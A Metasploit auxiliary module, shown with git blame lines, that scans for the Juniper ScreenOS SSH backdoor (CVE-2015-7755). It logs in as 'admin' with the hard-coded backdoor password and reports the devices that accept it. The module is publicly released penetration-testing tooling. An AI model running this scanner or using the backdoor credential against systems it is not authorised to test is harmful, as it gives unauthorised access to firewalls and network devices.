metasploit-framework/modules/auxiliary/scanner/ssh/juniper_backdoor.rb

83 lines
2.2 KiB
Ruby
Raw Normal View History

2016-03-30 01:20:12 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
2016-03-30 01:20:12 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-04-01 16:45:19 +00:00
require 'net/ssh'
2016-03-30 01:20:12 +00:00
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH
2016-03-30 01:20:12 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Juniper SSH Backdoor Scanner',
'Description' => %q{
2016-04-01 16:45:19 +00:00
This module scans for the Juniper SSH backdoor (also valid on Telnet).
Any username is required, and the password is <<< %s(un='%s') = %u.
2016-03-30 01:20:12 +00:00
},
'Author' => [
2016-04-01 16:45:19 +00:00
'hdm', # Discovery
'h00die <mike[at]stcyrsecurity.com>' # Module
2016-03-30 01:20:12 +00:00
],
'References' => [
['CVE', '2015-7755'],
['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'],
2016-04-01 16:45:19 +00:00
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
2016-03-30 01:20:12 +00:00
],
'DisclosureDate' => 'Dec 20 2015',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(22)
])
register_advanced_options([
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end
def run_host(ip)
factory = ssh_socket_factory
2016-03-30 01:20:12 +00:00
ssh_opts = {
port: rport,
auth_methods: ['password', 'keyboard-interactive'],
password: %q{<<< %s(un='%s') = %u},
proxy: factory,
:non_interactive => true
2016-03-30 01:20:12 +00:00
}
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(
ip,
'admin',
ssh_opts
)
end
rescue Net::SSH::Exception => e
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
return
end
if ssh
2016-04-01 16:45:19 +00:00
print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")
2016-03-30 01:20:12 +00:00
report_vuln(
:host => ip,
:name => self.name,
:refs => self.references,
:info => ssh.transport.server_version.version
)
end
end
def rport
datastore['RPORT']
end
end